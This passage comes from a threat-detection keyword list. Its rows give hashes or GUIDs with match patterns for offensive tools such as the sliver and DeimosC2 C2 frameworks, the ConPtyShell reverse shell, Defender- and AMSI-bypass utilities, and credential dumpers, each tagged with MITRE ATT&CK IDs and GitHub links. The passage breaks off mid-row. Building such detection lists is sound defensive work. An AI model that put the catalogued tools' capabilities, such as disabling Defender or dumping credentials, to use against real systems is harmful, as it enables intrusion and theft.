"*36c6bc3f7f5efd96f7bf472d30119cf22142383adaf774b96732b27ecefe9159*",".{0,1000}36c6bc3f7f5efd96f7bf472d30119cf22142383adaf774b96732b27ecefe9159.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*36c88f1852f3c162bf64d973bb6f69ffb7e22503015e104716fc51eaddcbe875*",".{0,1000}36c88f1852f3c162bf64d973bb6f69ffb7e22503015e104716fc51eaddcbe875.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","0","N/A","8","4","353","39","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" "*36cbfc729051ef456ce4f71973619ce33c05ef4c3072a6cdf4e1ff555ab5a231*",".{0,1000}36cbfc729051ef456ce4f71973619ce33c05ef4c3072a6cdf4e1ff555ab5a231.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*36EBF9AA-2F37-4F1D-A2F1-F2A45DEEAF21*",".{0,1000}36EBF9AA\-2F37\-4F1D\-A2F1\-F2A45DEEAF21.{0,1000}","offensive_tool_keyword","PowerShdll","Run PowerShell with dlls only Does not require access to powershell.exe as it uses powershell automation dlls. PowerShdll can be run with: rundll32.exe. installutil.exe. regsvcs.exe. regasm.exe. regsvr32.exe or as a standalone executable.","T1059 - T1218 - T1216 - T1053 - T1118","TA0002 - TA0008 - TA0003","N/A","N/A","Defense Evasion","https://github.com/p3nt4/PowerShdll","1","0","N/A","N/A","10","1711","251","2021-03-17T02:02:23Z","2016-07-15T00:08:32Z" "*36F9C306-5F45-4946-A259-610C05BD90DF*",".{0,1000}36F9C306\-5F45\-4946\-A259\-610C05BD90DF.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","669","140","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*36fa3d212c2159c8e1b769bed63fd12c77cdff60f3d13e0b36a554d8e82d6f17*",".{0,1000}36fa3d212c2159c8e1b769bed63fd12c77cdff60f3d13e0b36a554d8e82d6f17.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*370acf4cc5645e10b1633c5df10fd5331bef377ea731e3c97e05b5538b4266d5*",".{0,1000}370acf4cc5645e10b1633c5df10fd5331bef377ea731e3c97e05b5538b4266d5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*37189960f1e5e6efbc79bf55ef7ee6840cc639ce46905691f89850a950fbdd94*",".{0,1000}37189960f1e5e6efbc79bf55ef7ee6840cc639ce46905691f89850a950fbdd94.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*375b4f81c0ce1ab360c6f369c4bb2765ba3d683aae1f33250bdd1d1a79f9d31d*",".{0,1000}375b4f81c0ce1ab360c6f369c4bb2765ba3d683aae1f33250bdd1d1a79f9d31d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*375D8508-F60D-4E24-9DF6-1E591D2FA474*",".{0,1000}375D8508\-F60D\-4E24\-9DF6\-1E591D2FA474.{0,1000}","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","0","N/A","10","1","89","20","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z" "*376713183026ccc822e9c1dead28cc81c7cfa7ad1c88e368ada6c31ce3909a2e*",".{0,1000}376713183026ccc822e9c1dead28cc81c7cfa7ad1c88e368ada6c31ce3909a2e.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","0","N/A","10","10","912","157","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" "*3768f75f13bf1f58b77046be2174d666f05006a8a139cdca85bc5cd291a81fa8*",".{0,1000}3768f75f13bf1f58b77046be2174d666f05006a8a139cdca85bc5cd291a81fa8.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*3787435B-8352-4BD8-A1C6-E5A1B73921F4*",".{0,1000}3787435B\-8352\-4BD8\-A1C6\-E5A1B73921F4.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","10","2","178","38","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z" "*379331177374643353a85fea9cd5934f1207a0fc6bb2370b658090240263ccbd*",".{0,1000}379331177374643353a85fea9cd5934f1207a0fc6bb2370b658090240263ccbd.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*37da8267b295caeca8fadb13206ba1c498a7012673430c5d856fe93862446a28*",".{0,1000}37da8267b295caeca8fadb13206ba1c498a7012673430c5d856fe93862446a28.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "*37f414a4928417fe375e6ba23c4028681bdfb1dd8d0130b20260caf3a4d33485*",".{0,1000}37f414a4928417fe375e6ba23c4028681bdfb1dd8d0130b20260caf3a4d33485.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*37f49e38ee8cc509bcae0842800b3d0c85072d6e56a8395aede48abeef0b9f28*",".{0,1000}37f49e38ee8cc509bcae0842800b3d0c85072d6e56a8395aede48abeef0b9f28.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*37ffc17e18e52704214b980c56fad5a3ee6c9941905a9b76a3c914d82f3d1a61*",".{0,1000}37ffc17e18e52704214b980c56fad5a3ee6c9941905a9b76a3c914d82f3d1a61.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*38074409fb6889d1a58cbda706a1167410e4a640630cf128472902a5967074af*",".{0,1000}38074409fb6889d1a58cbda706a1167410e4a640630cf128472902a5967074af.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*381135de47985bd9d5079830dae251313b9f08458da9e8185b6253d8e477fd9c*",".{0,1000}381135de47985bd9d5079830dae251313b9f08458da9e8185b6253d8e477fd9c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*38189c5fd3ff9946f4498d31e11bb47e49e276e445050f1b9ba9d84b40e55c65*",".{0,1000}38189c5fd3ff9946f4498d31e11bb47e49e276e445050f1b9ba9d84b40e55c65.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*382B6332-4A57-458D-96EB-B312688A7604*",".{0,1000}382B6332\-4A57\-458D\-96EB\-B312688A7604.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*385a18846808ae7f07d1be33dfe8c850736eec33910e1366fdff14bb4384b690*",".{0,1000}385a18846808ae7f07d1be33dfe8c850736eec33910e1366fdff14bb4384b690.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*388cab24c7ad1eab00833aa5200541295ba3e17d39d01636f2a8bbb37c732b00*",".{0,1000}388cab24c7ad1eab00833aa5200541295ba3e17d39d01636f2a8bbb37c732b00.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*389081eec49334d1d6ef3ba46e2167f6f3010443cf39a4f2e431b274fb58c369*",".{0,1000}389081eec49334d1d6ef3ba46e2167f6f3010443cf39a4f2e431b274fb58c369.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*38a838f0558351bea32e58dd7f5bafe47a66c54c14f2be2cbf1631109377257f*",".{0,1000}38a838f0558351bea32e58dd7f5bafe47a66c54c14f2be2cbf1631109377257f.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*38ea755e162c55ef70f9506dddfd01641fc838926af9c43eda652da63c67058b*",".{0,1000}38ea755e162c55ef70f9506dddfd01641fc838926af9c43eda652da63c67058b.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","10","10","1075","161","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" "*38f4134e67348c6eb804f52463d9b3716ffa93ead0db4aa21ff9231bc91fc52a*",".{0,1000}38f4134e67348c6eb804f52463d9b3716ffa93ead0db4aa21ff9231bc91fc52a.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*390b859b5bb058c09998a5eb532d819b4977924c81a2f3ddd4f36c4b9d26f2bf*",".{0,1000}390b859b5bb058c09998a5eb532d819b4977924c81a2f3ddd4f36c4b9d26f2bf.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*3930e87199b44252705c1114f728e3ca38e6439a7279ef8d7fd33fa9869b9b43*",".{0,1000}3930e87199b44252705c1114f728e3ca38e6439a7279ef8d7fd33fa9869b9b43.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*394cd66a9040e0c75a2faa3f9108029689df136927665573bf4a457f58c9a798*",".{0,1000}394cd66a9040e0c75a2faa3f9108029689df136927665573bf4a457f58c9a798.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*3951c1b03367cc1dc4de8290ec9507dad9f239a53b815f09691dea5a78c00901*",".{0,1000}3951c1b03367cc1dc4de8290ec9507dad9f239a53b815f09691dea5a78c00901.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*39537a85f0b719915f068289d3e6da72899861afcdb3ca5d7a78de505629ac8d*",".{0,1000}39537a85f0b719915f068289d3e6da72899861afcdb3ca5d7a78de505629ac8d.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*395408bc1ac0cbe250b3131c09592f7ac490a77a2625ce2f213480a96fcc8bd4*",".{0,1000}395408bc1ac0cbe250b3131c09592f7ac490a77a2625ce2f213480a96fcc8bd4.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*39666b5eecc134e2d6c22ef6233faee7f8556383c82368b98d85ff106931f751*",".{0,1000}39666b5eecc134e2d6c22ef6233faee7f8556383c82368b98d85ff106931f751.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*396febb7796a5a3ba0250af4700e9fa21240a83c4ebc2a744da0c2f028ca396c*",".{0,1000}396febb7796a5a3ba0250af4700e9fa21240a83c4ebc2a744da0c2f028ca396c.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*3998762030e8de14ef07cd7befce737e4ab9d4fa0682621dedb56e7774a941d5*",".{0,1000}3998762030e8de14ef07cd7befce737e4ab9d4fa0682621dedb56e7774a941d5.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*39a32bbb1285b51059b5e7780f3e0b49dff4496e904641219215ea13634aa8fd*",".{0,1000}39a32bbb1285b51059b5e7780f3e0b49dff4496e904641219215ea13634aa8fd.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*39a9dada9b6dc223cba7c4cb35efceb7cd9e40345c362c15e4c203d16f65de9f*",".{0,1000}39a9dada9b6dc223cba7c4cb35efceb7cd9e40345c362c15e4c203d16f65de9f.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*39a9f25d64ef416e4be4fadf6fae1b2169bfeb02501be443e8af1fec17412f60*",".{0,1000}39a9f25d64ef416e4be4fadf6fae1b2169bfeb02501be443e8af1fec17412f60.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "*39b7a8fec13a9cee773a09c4f277a490b07fd2dd3009a7ee9092165688d7da32*",".{0,1000}39b7a8fec13a9cee773a09c4f277a490b07fd2dd3009a7ee9092165688d7da32.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*39f0a8aa528f48997f9d2b81845eb9f7fbdf6151f34f883ee30da4649cc151ae*",".{0,1000}39f0a8aa528f48997f9d2b81845eb9f7fbdf6151f34f883ee30da4649cc151ae.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*3a04d62f46cebdb6a568e6a9099106314ca6398f9dedd2e5433e3a890505f62e*",".{0,1000}3a04d62f46cebdb6a568e6a9099106314ca6398f9dedd2e5433e3a890505f62e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation 